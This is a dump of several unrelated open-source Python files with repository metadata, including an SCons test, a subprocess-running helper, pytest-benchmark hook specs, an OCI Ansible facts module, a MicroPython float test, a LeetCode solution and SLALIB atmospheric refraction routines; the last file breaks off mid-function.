                    print "Please enter a device name:"
                    device_name = raw_input("> ")
            process_records(records, pre_proc_files, ioctl_name, device_name, x)
# Script entry point.
if __name__ == '__main__':
    main()
| 33.655936 | 304 | 0.569857 |
a19317db99ecc5656366838a3d6783e33daac5b5 | 3,059 | py | Python | test/TempFileMunge/TEMPFILESUFFIX.py | janem-msu/scons | 40f815f687b93afa6ef4deb7293a26e869402cca | [
"MIT"
] | null | null | null | test/TempFileMunge/TEMPFILESUFFIX.py | janem-msu/scons | 40f815f687b93afa6ef4deb7293a26e869402cca | [
"MIT"
] | null | null | null | test/TempFileMunge/TEMPFILESUFFIX.py | janem-msu/scons | 40f815f687b93afa6ef4deb7293a26e869402cca | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Verify that setting the $TEMPFILESUFFIX variable will cause
it to appear at the end of name of the generated tempfile
used for long command lines.
"""
import os
import stat
import TestSCons
test = TestSCons.TestSCons(match=TestSCons.match_re)
test.write('SConstruct', """
import os
env = Environment(
BUILDCOM = '${TEMPFILE("xxx.py $TARGET $SOURCES")}',
MAXLINELENGTH = 16,
TEMPFILESUFFIX = '.foo',
)
env.AppendENVPath('PATH', os.curdir)
env.Command('foo.out', 'foo.in', '$BUILDCOM')
""")
test.write('foo.in', "foo.in\n")
test.run(arguments = '-n -Q .',
stdout = """\
Using tempfile \\S+ for command line:
xxx.py foo.out foo.in
xxx.py \\S+
""")
test.write('SConstruct', """
import os
def print_cmd_line(s, targets, sources, env):
pass
env = Environment(
BUILDCOM = '${TEMPFILE("xxx.py $TARGET $SOURCES")}',
MAXLINELENGTH = 16,
TEMPFILESUFFIX = '.foo',
PRINT_CMD_LINE_FUNC=print_cmd_line
)
env.AppendENVPath('PATH', os.curdir)
env.Command('foo.out', 'foo.in', '$BUILDCOM')
""")
test.run(arguments = '-n -Q .',
stdout = """""")
test.write('SConstruct', """
import os
from SCons.Platform import TempFileMunge
class TestTempFileMunge(TempFileMunge):
def __init__(self, cmd, cmdstr = None):
super(TestTempFileMunge, self).__init__(cmd, cmdstr)
def _print_cmd_str(self, target, source, env, cmdstr):
super(TestTempFileMunge, self)._print_cmd_str(target, source, None, cmdstr)
env = Environment(
TEMPFILE = TestTempFileMunge,
BUILDCOM = '${TEMPFILE("xxx.py $TARGET $SOURCES")}',
MAXLINELENGTH = 16,
TEMPFILESUFFIX = '.foo',
)
env.AppendENVPath('PATH', os.curdir)
env.Command('foo.out', 'foo.in', '$BUILDCOM')
""")
test.run(arguments = '-n -Q .',
stdout = """\
Using tempfile \\S+ for command line:
xxx.py foo.out foo.in
xxx.py \\S+
""")
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| 27.558559 | 83 | 0.704479 |
bf61decc4a7117550ca0e7b3ed0a2a9cf1b70c6a | 3,167 | py | Python | seqcluster/libs/do.py | lpantano/seqcluster | e4ef3581e6a16a31ae1f3d2bb5a83bef3ed84e26 | [
"MIT"
] | 33 | 2015-01-26T23:18:01.000Z | 2022-01-07T21:40:49.000Z | seqcluster/libs/do.py | lpantano/seqcluster | e4ef3581e6a16a31ae1f3d2bb5a83bef3ed84e26 | [
"MIT"
] | 44 | 2015-01-21T17:43:42.000Z | 2021-08-25T15:49:18.000Z | seqcluster/libs/do.py | lpantano/seqcluster | e4ef3581e6a16a31ae1f3d2bb5a83bef3ed84e26 | [
"MIT"
] | 18 | 2015-05-18T15:34:32.000Z | 2021-02-10T17:58:24.000Z | """Centralize running of external commands, providing logging and tracking. Integrated from bcbio package with some changes.
"""
import collections
import os
import subprocess
import logging
# Python 2/3 compatibility: Python 3 has no basestring, fall back to str.
try:
    basestring
except NameError:
    basestring = str

logger = logging.getLogger("run")
def run(cmd, data=None, checks=None, region=None, log_error=True,
        log_stdout=False):
    """Run the provided command, logging details and checking for errors.

    :param cmd: command to execute; a string (run through a shell) or a list
        of arguments.
    :param data: unused; kept for backwards compatibility with callers.
    :param checks: optional callables forwarded to _do_run; each must return
        a truthy value or an IOError is raised.
    :param region: unused; kept for backwards compatibility with callers.
    :param log_error: when True, log a note before re-raising a failure.
    :param log_stdout: forwarded to _do_run to control stdout logging.
    """
    try:
        logger.debug(" ".join(str(x) for x in cmd) if not isinstance(cmd, basestring) else cmd)
        _do_run(cmd, checks, log_stdout)
    # Explicit BaseException keeps the old bare-except semantics (the note is
    # also logged for KeyboardInterrupt/SystemExit) while avoiding E722.
    except BaseException:
        if log_error:
            logger.info("error at command")
        raise
def find_bash():
    """Locate a usable bash executable, preferring whatever `which` reports."""
    candidates = [find_cmd("bash"), "/bin/bash", "/usr/bin/bash", "/usr/local/bin/bash"]
    for candidate in candidates:
        if candidate and os.path.exists(candidate):
            return candidate
    raise IOError("Could not find bash in any standard location. Needed for unix pipes")
def find_cmd(cmd):
    """Return the path `which` reports for *cmd*, or None when not found.

    NOTE(review): on Python 3 the returned path is bytes (check_output
    output), matching the original behavior.
    """
    try:
        located = subprocess.check_output(["which", cmd])
    except subprocess.CalledProcessError:
        return None
    return located.strip()
def _normalize_cmd_args(cmd):
    """Normalize subprocess arguments to handle list commands, string and pipes.

    Piped commands set pipefail and require use of bash to help with debugging
    intermediate errors.

    Returns a (cmd, shell, executable) tuple suitable for subprocess.Popen.
    """
    if isinstance(cmd, basestring):
        # check for standard or anonymous named pipes
        # BUGFIX: the previous test used `cmd.find(">(")` / `cmd.find("<(")`
        # truthiness; str.find returns -1 (truthy) when absent, so every
        # string command was routed through bash with pipefail. Substring
        # membership expresses the intent correctly.
        if " | " in cmd or ">(" in cmd or "<(" in cmd:
            return "set -o pipefail; " + cmd, True, find_bash()
        else:
            return cmd, True, None
    else:
        # List of arguments: stringify each element for subprocess.
        return [str(x) for x in cmd], False, None
def _do_run(cmd, checks, log_stdout=False):
    """Perform running and check results, raising errors for issues.

    Streams the child's combined stdout/stderr line by line into a bounded
    deque (last 100 lines) used to build the error message on failure.
    """
    cmd, shell_arg, executable_arg = _normalize_cmd_args(cmd)
    s = subprocess.Popen(cmd, shell=shell_arg, executable=executable_arg,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT, close_fds=True)
    debug_stdout = collections.deque(maxlen=100)
    while 1:
        line = s.stdout.readline()
        if line:
            debug_stdout.append(line)
            # NOTE(review): both branches are identical here; upstream bcbio
            # logs to a separate stdout logger when log_stdout is True.
            if log_stdout:
                logger.debug(line.rstrip())
            else:
                logger.debug(line.rstrip())
        exitcode = s.poll()
        if exitcode is not None:
            # Drain whatever remains buffered after the process exited.
            for line in s.stdout:
                debug_stdout.append(line)
            if exitcode is not None and exitcode != 0:
                error_msg = " ".join(cmd) if not isinstance(cmd, basestring) else cmd
                error_msg += "\n"
                error_msg += "".join(bytes_out.decode('utf-8') for bytes_out in debug_stdout)
                s.communicate()
                s.stdout.close()
                raise subprocess.CalledProcessError(exitcode, error_msg)
            else:
                break
    s.communicate()
    s.stdout.close()
    # Check for problems not identified by shell return codes
    if checks:
        for check in checks:
            if not check():
                raise IOError("External command failed")
| 35.188889 | 124 | 0.615093 |
2482645bfe0b53a3d77a3944d0becb58a07dd6fe | 4,156 | py | Python | src/pytest_benchmark/hookspec.py | Ekultek/pytest-benchmark | cdfab1379b64fea7fa28cb868d768606e10cede2 | [
"BSD-2-Clause"
] | null | null | null | src/pytest_benchmark/hookspec.py | Ekultek/pytest-benchmark | cdfab1379b64fea7fa28cb868d768606e10cede2 | [
"BSD-2-Clause"
] | null | null | null | src/pytest_benchmark/hookspec.py | Ekultek/pytest-benchmark | cdfab1379b64fea7fa28cb868d768606e10cede2 | [
"BSD-2-Clause"
] | 1 | 2021-04-22T08:54:07.000Z | 2021-04-22T08:54:07.000Z | def pytest_benchmark_generate_machine_info(config):
"""
To completely replace the generated machine_info do something like this:
.. sourcecode:: python
def pytest_benchmark_update_machine_info(config):
return {'user': getpass.getuser()}
"""
pass
def pytest_benchmark_update_machine_info(config, info):
    """
    If benchmarks are compared and machine_info is different then warnings will be shown.

    To add the current user to the commit info override the hook in your conftest.py like this:

    .. sourcecode:: python

        def pytest_benchmark_update_machine_info(config, info):
            info['user'] = getpass.getuser()
    """
    # Hook specification only; mutate *info* in place in your conftest.py.
    pass
def pytest_benchmark_generate_commit_info(config):
    """
    To completely replace the generated commit_info do something like this:

    .. sourcecode:: python

        def pytest_benchmark_generate_commit_info(config):
            return {'id': subprocess.check_output(['svnversion']).strip()}
    """
    # Hook specification only; firstresult (see module bottom) -- the first
    # non-None return value wins.
    pass
def pytest_benchmark_update_commit_info(config, info):
    """
    To add something into the commit_info, like the commit message do something like this:

    .. sourcecode:: python

        def pytest_benchmark_update_commit_info(config, info):
            info['message'] = subprocess.check_output(['git', 'log', '-1', '--pretty=%B']).strip()
    """
    # Hook specification only; mutate *info* in place in your conftest.py.
    pass
def pytest_benchmark_group_stats(config, benchmarks, group_by):
    """
    You may perform grouping customization here, in case the builtin grouping doesn't suit you.

    Example:

    .. sourcecode:: python

        @pytest.mark.hookwrapper
        def pytest_benchmark_group_stats(config, benchmarks, group_by):
            outcome = yield
            if group_by == "special":  # when you use --benchmark-group-by=special
                result = defaultdict(list)
                for bench in benchmarks:
                    # `bench.special` doesn't exist, replace with whatever you need
                    result[bench.special].append(bench)
                outcome.force_result(result.items())
    """
    # Hook specification only; firstresult -- implement in conftest.py to
    # override how benchmark results are grouped for the report.
    pass
def pytest_benchmark_generate_json(config, benchmarks, include_data, machine_info, commit_info):
    """
    You should read pytest-benchmark's code if you really need to wholly customize the json.

    .. warning::

        Improperly customizing this may cause breakage if ``--benchmark-compare`` or ``--benchmark-histogram`` are used.

    By default, ``pytest_benchmark_generate_json`` strips benchmarks that have errors from the output. To prevent this,
    implement the hook like this:

    .. sourcecode:: python

        @pytest.mark.hookwrapper
        def pytest_benchmark_generate_json(config, benchmarks, include_data, machine_info, commit_info):
            for bench in benchmarks:
                bench.has_error = False
            yield
    """
    # Hook specification only; firstresult -- the plugin supplies the default
    # JSON generation.
    pass
def pytest_benchmark_update_json(config, benchmarks, output_json):
    """
    Use this to add custom fields in the output JSON.

    Example:

    .. sourcecode:: python

        def pytest_benchmark_update_json(config, benchmarks, output_json):
            output_json['foo'] = 'bar'
    """
    # Hook specification only; mutate *output_json* in place in conftest.py.
    pass
def pytest_benchmark_compare_machine_info(config, benchmarksession, machine_info, compared_benchmark):
    """
    You may want to use this hook to implement custom checks or abort execution.
    ``pytest-benchmark`` builtin hook does this:

    .. sourcecode:: python

        def pytest_benchmark_compare_machine_info(config, benchmarksession, machine_info, compared_benchmark):
            if compared_benchmark["machine_info"] != machine_info:
                benchmarksession.logger.warn(
                    "Benchmark machine_info is different. Current: %s VS saved: %s." % (
                        format_dict(machine_info),
                        format_dict(compared_benchmark["machine_info"]),
                    )
                )
    """
    # Hook specification only; see the builtin implementation in the plugin.
    pass
# Mark the generate_*/group hooks as firstresult: pluggy stops at the first
# plugin/conftest implementation that returns a non-None value.
pytest_benchmark_generate_commit_info.firstresult = True
pytest_benchmark_generate_json.firstresult = True
pytest_benchmark_generate_machine_info.firstresult = True
pytest_benchmark_group_stats.firstresult = True
| 31.725191 | 120 | 0.672522 |
f534b28874f53b5f9c467ab891cdcbb51dc8f53c | 11,033 | py | Python | plugins/modules/oci_healthchecks_http_monitor_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | [
"Apache-2.0"
] | null | null | null | plugins/modules/oci_healthchecks_http_monitor_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | [
"Apache-2.0"
] | null | null | null | plugins/modules/oci_healthchecks_http_monitor_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type

# Standard Ansible module metadata consumed by ansible-doc tooling.
ANSIBLE_METADATA = {
    "metadata_version": "1.1",
    "status": ["preview"],
    "supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_healthchecks_http_monitor_facts
short_description: Fetches details about one or multiple HttpMonitor resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple HttpMonitor resources in Oracle Cloud Infrastructure
- Gets a list of HTTP monitors.
- If I(monitor_id) is specified, the details of a single HttpMonitor will be returned.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
monitor_id:
description:
- The OCID of a monitor.
- Required to get a specific http_monitor.
type: str
aliases: ["id"]
compartment_id:
description:
- Filters results by compartment.
- Required to list multiple http_monitors.
type: str
sort_by:
description:
- The field to sort by when listing monitors.
type: str
choices:
- "id"
- "displayName"
- "timeCreated"
sort_order:
description:
- Controls the sort order of results.
type: str
choices:
- "ASC"
- "DESC"
display_name:
description:
- Filters results that exactly match the `displayName` field.
type: str
aliases: ["name"]
home_region:
description:
- Filters results that match the `homeRegion`.
type: str
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: Get a specific http_monitor
oci_healthchecks_http_monitor_facts:
# required
monitor_id: "ocid1.monitor.oc1..xxxxxxEXAMPLExxxxxx"
- name: List http_monitors
oci_healthchecks_http_monitor_facts:
# required
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
# optional
sort_by: id
sort_order: ASC
display_name: display_name_example
home_region: us-phoenix-1
"""
RETURN = """
http_monitors:
description:
- List of HttpMonitor resources
returned: on success
type: complex
contains:
id:
description:
- The OCID of the resource.
returned: on success
type: str
sample: "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx"
results_url:
description:
- A URL for fetching the probe results.
returned: on success
type: str
sample: results_url_example
home_region:
description:
- The region where updates must be made and where results must be fetched from.
returned: on success
type: str
sample: us-phoenix-1
time_created:
description:
- The RFC 3339-formatted creation date and time of the probe.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
compartment_id:
description:
- The OCID of the compartment.
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
targets:
description:
- A list of targets (hostnames or IP addresses) of the probe.
- Returned for get operation
returned: on success
type: list
sample: []
vantage_point_names:
description:
- A list of names of vantage points from which to execute the probe.
- Returned for get operation
returned: on success
type: list
sample: []
port:
description:
- The port on which to probe endpoints. If unspecified, probes will use the
default port of their protocol.
- Returned for get operation
returned: on success
type: int
sample: 56
timeout_in_seconds:
description:
- "The probe timeout in seconds. Valid values: 10, 20, 30, and 60.
The probe timeout must be less than or equal to `intervalInSeconds` for monitors."
- Returned for get operation
returned: on success
type: int
sample: 56
protocol:
description:
- ""
returned: on success
type: str
sample: HTTP
method:
description:
- ""
- Returned for get operation
returned: on success
type: str
sample: GET
path:
description:
- The optional URL path to probe, including query parameters.
- Returned for get operation
returned: on success
type: str
sample: path_example
headers:
description:
- A dictionary of HTTP request headers.
- "*Note:* Monitors and probes do not support the use of the `Authorization` HTTP header."
- Returned for get operation
returned: on success
type: dict
sample: {}
display_name:
description:
- A user-friendly and mutable name suitable for display in a user interface.
returned: on success
type: str
sample: display_name_example
interval_in_seconds:
description:
- "The monitor interval in seconds. Valid values: 10, 30, and 60."
returned: on success
type: int
sample: 56
is_enabled:
description:
- Enables or disables the monitor. Set to 'true' to launch monitoring.
returned: on success
type: bool
sample: true
freeform_tags:
description:
- "Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information,
see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
Example: `{\\"Department\\": \\"Finance\\"}`"
returned: on success
type: dict
sample: {'Department': 'Finance'}
defined_tags:
description:
- "Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
returned: on success
type: dict
sample: {'Operations': {'CostCenter': 'US'}}
sample: [{
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"results_url": "results_url_example",
"home_region": "us-phoenix-1",
"time_created": "2013-10-20T19:20:30+01:00",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"targets": [],
"vantage_point_names": [],
"port": 56,
"timeout_in_seconds": 56,
"protocol": "HTTP",
"method": "GET",
"path": "path_example",
"headers": {},
"display_name": "display_name_example",
"interval_in_seconds": 56,
"is_enabled": true,
"freeform_tags": {'Department': 'Finance'},
"defined_tags": {'Operations': {'CostCenter': 'US'}}
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
# Defer SDK-availability failure: main() reports a clean module error
# instead of an ImportError traceback when the OCI SDK is absent.
try:
    from oci.healthchecks import HealthChecksClient

    HAS_OCI_PY_SDK = True
except ImportError:
    HAS_OCI_PY_SDK = False
class HttpMonitorFactsHelperGen(OCIResourceFactsHelperBase):
    """Facts helper for HttpMonitor resources. Supported operations: get, list."""

    def get_required_params_for_get(self):
        # A single monitor is addressed by its OCID.
        return ["monitor_id"]

    def get_required_params_for_list(self):
        # Listing is scoped to a compartment.
        return ["compartment_id"]

    def get_resource(self):
        monitor_id = self.module.params.get("monitor_id")
        return oci_common_utils.call_with_backoff(
            self.client.get_http_monitor, monitor_id=monitor_id
        )

    def list_resources(self):
        # Forward only the optional filters the user actually supplied.
        optional_params = ("sort_by", "sort_order", "display_name", "home_region")
        kwargs = {}
        for name in optional_params:
            value = self.module.params.get(name)
            if value is not None:
                kwargs[name] = value
        return oci_common_utils.list_all_resources(
            self.client.list_http_monitors,
            compartment_id=self.module.params.get("compartment_id"),
            **kwargs
        )
# Installations may ship a custom class to override the generated behaviour.
HttpMonitorFactsHelperCustom = get_custom_class("HttpMonitorFactsHelperCustom")


class ResourceFactsHelper(HttpMonitorFactsHelperCustom, HttpMonitorFactsHelperGen):
    """Concrete helper: custom overrides take MRO precedence over generated code."""
    pass
def main():
    """Ansible module entry point: declare the argument spec, then dispatch
    to get (single monitor) or list (all monitors in a compartment)."""
    module_args = oci_common_utils.get_common_arg_spec()
    module_args.update(
        dict(
            monitor_id=dict(aliases=["id"], type="str"),
            compartment_id=dict(type="str"),
            sort_by=dict(type="str", choices=["id", "displayName", "timeCreated"]),
            sort_order=dict(type="str", choices=["ASC", "DESC"]),
            display_name=dict(aliases=["name"], type="str"),
            home_region=dict(type="str"),
        )
    )
    module = AnsibleModule(argument_spec=module_args)
    if not HAS_OCI_PY_SDK:
        module.fail_json(msg="oci python sdk required for this module.")
    resource_facts_helper = ResourceFactsHelper(
        module=module,
        resource_type="http_monitor",
        service_client_class=HealthChecksClient,
        namespace="healthchecks",
    )
    result = []
    # is_get()/is_list() inspect which required parameters were supplied.
    if resource_facts_helper.is_get():
        result = [resource_facts_helper.get()]
    elif resource_facts_helper.is_list():
        result = resource_facts_helper.list()
    else:
        resource_facts_helper.fail()
    module.exit_json(http_monitors=result)
# Standard Ansible module entry point.
if __name__ == "__main__":
    main()
| 32.545723 | 133 | 0.591498 |
bb670586ae5153c457ff5a88c9fad0659426cc65 | 1,244 | py | Python | tests/float/float1.py | 0x0ece/micropython | 4ee07f4883136dfbd1795dea3b04c478072d5630 | [
"MIT"
] | null | null | null | tests/float/float1.py | 0x0ece/micropython | 4ee07f4883136dfbd1795dea3b04c478072d5630 | [
"MIT"
] | null | null | null | tests/float/float1.py | 0x0ece/micropython | 4ee07f4883136dfbd1795dea3b04c478072d5630 | [
"MIT"
] | null | null | null | # test basic float capabilities
# NOTE(review): this is an expected-output test (stdout is compared against a
# reference run), so only comments may change here.
# literals
print(.12)
print(1.)
print(1.2)
# float construction
print(float(1.2))
# unary operators
print(bool(0.0))
print(bool(1.2))
print(+(1.2))
print(-(1.2))
# division of integers yields a float (true division)
x = 1 / 2
print(x)
# /= operator
a = 1
a /= 2
print(a)
# floor division with float operands
print(1.0 // 2)
print(2.0 // 2)
# comparison
print(1.2 <= 3.4)
print(1.2 <= -3.4)
print(1.2 >= 3.4)
print(1.2 >= -3.4)
# float division/modulo by zero raises rather than returning inf/nan
try:
    1.0 / 0
except ZeroDivisionError:
    print("ZeroDivisionError")
try:
    1.0 // 0
except ZeroDivisionError:
    print("ZeroDivisionError")
try:
    1.2 % 0
except ZeroDivisionError:
    print("ZeroDivisionError")
# unsupported unary ops
try:
    ~1.2
except TypeError:
    print("TypeError")
try:
    1.2 in 3.4
except TypeError:
    print("TypeError")
# can't convert list to float
try:
    float([])
except TypeError:
    print("TypeError")
# test constant float with more than 255 chars (exercises long-literal lexing)
x = 1.84728699436059052516398251149631771898472869943605905251639825114963177189847286994360590525163982511496317718984728699436059052516398251149631771898472869943605905251639825114963177189847286994360590525163982511496317718984728699436059052516398251149631771898472869943605905251639825114963177189
print("%.5f" % x)
| 17.277778 | 302 | 0.722669 |
21b59cf1f9b78bb9824798ef0bcc3ca7754aa7ec | 675 | py | Python | Leetcode/0632. Smallest Range Covering Elements from K Lists/0632.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | Leetcode/0632. Smallest Range Covering Elements from K Lists/0632.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | Leetcode/0632. Smallest Range Covering Elements from K Lists/0632.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | class Solution:
def smallestRange(self, nums: List[List[int]]) -> List[int]:
minHeap = [(row[0], i, 0) for i, row in enumerate(nums)]
heapq.heapify(minHeap)
maxRange = max(row[0] for row in nums)
minRange = heapq.nsmallest(1, minHeap)[0][0]
ans = [minRange, maxRange]
while len(minHeap) == len(nums):
num, r, c = heapq.heappop(minHeap)
if c + 1 < len(nums[r]):
heapq.heappush(minHeap, (nums[r][c + 1], r, c + 1))
maxRange = max(maxRange, nums[r][c + 1])
minRange = heapq.nsmallest(1, minHeap)[0][0]
if maxRange - minRange < ans[1] - ans[0]:
ans[0], ans[1] = minRange, maxRange
return ans
| 33.75 | 62 | 0.580741 |
d954041a77119f7fa3df54692d23a434e8357d8e | 17,647 | py | Python | kai/reduce/slalib.py | skterry/KAI | b8ccf003bf892692bdf00f4bd112e2a7a2938a5b | [
"BSD-3-Clause"
] | 1 | 2021-07-26T18:56:24.000Z | 2021-07-26T18:56:24.000Z | kai/reduce/slalib.py | skterry/KAI | b8ccf003bf892692bdf00f4bd112e2a7a2938a5b | [
"BSD-3-Clause"
] | null | null | null | kai/reduce/slalib.py | skterry/KAI | b8ccf003bf892692bdf00f4bd112e2a7a2938a5b | [
"BSD-3-Clause"
] | 1 | 2015-11-05T07:39:11.000Z | 2015-11-05T07:39:11.000Z | import math
def refco(HM, TDK, PMB, RH, WL, PHI, TLR, EPS):
"""
Determine the constants A and B in the atmospheric refraction
model dZ = A tan Z + B tan**3 Z.
Z is the "observed" zenith distance (i.e. affected by refraction)
and dZ is what to add to Z to give the "topocentric" (i.e. in vacuo)
zenith distance.
Given:
HM d height of the observer above sea level (metre)
TDK d ambient temperature at the observer (deg K)
PMB d pressure at the observer (millibar)
RH d relative humidity at the observer (range 0-1)
WL d effective wavelength of the source (micrometre)
PHI d latitude of the observer (radian, astronomical)
TLR d temperature lapse rate in the troposphere (degK/metre)
EPS d precision required to terminate iteration (radian)
Returned:
REFA d tan Z coefficient (radian)
REFB d tan**3 Z coefficient (radian)
Called: refco
Notes:
1 Typical values for the TLR and EPS arguments might be 0.0065D0 and
1D-10 respectively.
2 The radio refraction is chosen by specifying WL > 100 micrometres.
3 The routine is a slower but more accurate alternative to the
slRFCQ routine. The constants it produces give perfect
agreement with slRFRO at zenith distances arctan(1) (45 deg)
and arctan(4) (about 76 deg). It achieves 0.5 arcsec accuracy
for ZD < 80 deg, 0.01 arcsec accuracy for ZD < 60 deg, and
0.001 arcsec accuracy for ZD < 45 deg.
P.T.Wallace Starlink 3 June 1997
Copyright (C) 1997 Rutherford Appleton Laboratory
Copyright (C) 1995 Association of Universities for Research in Astronomy Inc.
Migrated from SLALIB (fortran) to python:
J. R. Lu -- 2015-05-13
"""
# Sample zenith distances: arctan(1) and arctan(4)
atn1 = 0.7853981633974483
atn4 = 1.325817663668033
# Determine refraction for the two sample zenith distances
R1 = refro(atn1, HM, TDK, PMB, RH, WL, PHI, TLR, EPS)
R2 = refro(atn4, HM, TDK, PMB, RH, WL, PHI, TLR, EPS)
# Solve for refraction constants
refa = (64.0 * R1 - R2) / 60.0
refb = (R2 - 4.0 * R1) / 60.0
return refa, refb
def refro(ZOBS, HM, TDK, PMB, RH, WL, PHI, TLR, EPS):
    """
    Atmospheric refraction for radio and optical/IR wavelengths.
    Given:
      ZOBS    d  observed zenith distance of the source (radian)
      HM      d  height of the observer above sea level (metre)
      TDK     d  ambient temperature at the observer (deg K)
      PMB     d  pressure at the observer (millibar)
      RH      d  relative humidity at the observer (range 0-1)
      WL      d  effective wavelength of the source (micrometre)
      PHI     d  latitude of the observer (radian, astronomical)
      TLR     d  temperature lapse rate in the troposphere (degK/metre)
      EPS     d  precision required to terminate iteration (radian)
    Returned:
      REF     d  refraction: in vacuo ZD minus observed ZD (radian)
    Notes:
    1  A suggested value for the TLR argument is 0.0065.  The
       refraction is significantly affected by TLR, and if studies
       of the local atmosphere have been carried out a better TLR
       value may be available.
    2  A suggested value for the EPS argument is 1D-8.  The result is
       usually at least two orders of magnitude more computationally
       precise than the supplied EPS value.
    3  The routine computes the refraction for zenith distances up
       to and a little beyond 90 deg using the method of Hohenkerk
       and Sinclair (NAO Technical Notes 59 and 63, subsequently adopted
       in the Explanatory Supplement, 1992 edition - see section 3.281).
    4  The code is a development of the optical/IR refraction subroutine
       AREF of C.Hohenkerk (HMNAO, September 1984), with extensions to
       support the radio case (A.T.Sinclair's water-vapour expressions,
       Gill 1982 Ps(T)/Pwo formulas, Murray 1983 gas constants).
    5  The radio refraction is chosen by specifying WL > 100 micrometres.
       Because the algorithm takes no account of the ionosphere, the
       accuracy deteriorates at low frequencies, below about 30 MHz.
    6  Before use, the value of ZOBS is expressed in the range +/- pi.
       If this ranged ZOBS is -ve, the result REF is computed from its
       absolute value before being made -ve to match.  In addition, if
       it has an absolute value greater than 93 deg, a fixed REF value
       equal to the result for ZOBS = 93 deg is returned, appropriately
       signed.
    7  Fixed values of the water vapour polytrope exponent, the height
       of the tropopause, and the height at which refraction is
       negligible are used, as in the original algorithm.
    8  The radio refraction has been tested against JCMT (Mauna Kea)
       work; agreement at the 0.1 arcsec level for moderate ZD.
    9  The relative humidity RH is formally defined in terms of
       "mixing ratio" rather than pressures or densities (Gill 1982).
    Called: da1p, atmt, atms
    P.T.Wallace   Starlink   3 June 1997
    Copyright (C) 1997 Rutherford Appleton Laboratory
    Copyright (C) 1995 Association of Universities for Research in Astronomy Inc.
    """
    # Fixed parameters
    # 93 degrees in radians
    D93 = 1.623156204
    # Universal gas constant
    GCR = 8314.32
    # Molecular weight of dry air
    DMD = 28.9644
    # Molecular weight of water vapour
    DMW = 18.0152
    # Mean Earth radius (metre)
    S = 6378120.0
    # Exponent of temperature dependence of water vapour pressure
    DELTA = 18.36
    # Height of tropopause (metre)
    HT = 11000.0
    # Upper limit for refractive effects (metre)
    HS = 80000.0
    # The refraction integrand
    def refi(r, dn, rdndr):
        return rdndr / (dn + rdndr)
    # Transform ZOBS into the normal range.
    ZOBS1 = da1p(ZOBS)
    # Clamp to 93 deg so larger zenith distances get the fixed 93-deg value
    # promised by note 6.  The original translation had min(abs(ZOBS1), 1.0e93)
    # here -- a transcription bug from the Fortran "MIN(ABS(ZOBS1),D93)" that
    # never clamped and left D93 unused.
    ZOBS2 = min(abs(ZOBS1), D93)
    # Keep other arguments within safe bounds.
    HMOK = min(max(HM, -1.0e3), 10.0e3)
    TDKOK = min(max(TDK, 100.0), 500.0)
    PMBOK = min(max(PMB, 0.0), 10000.0)
    RHOK = min(max(RH, 0.0), 1.0)
    WLOK = max(WL, 0.1)
    ALPHA = min(max(abs(TLR), 0.001), 0.01)
    # Tolerance for iteration.
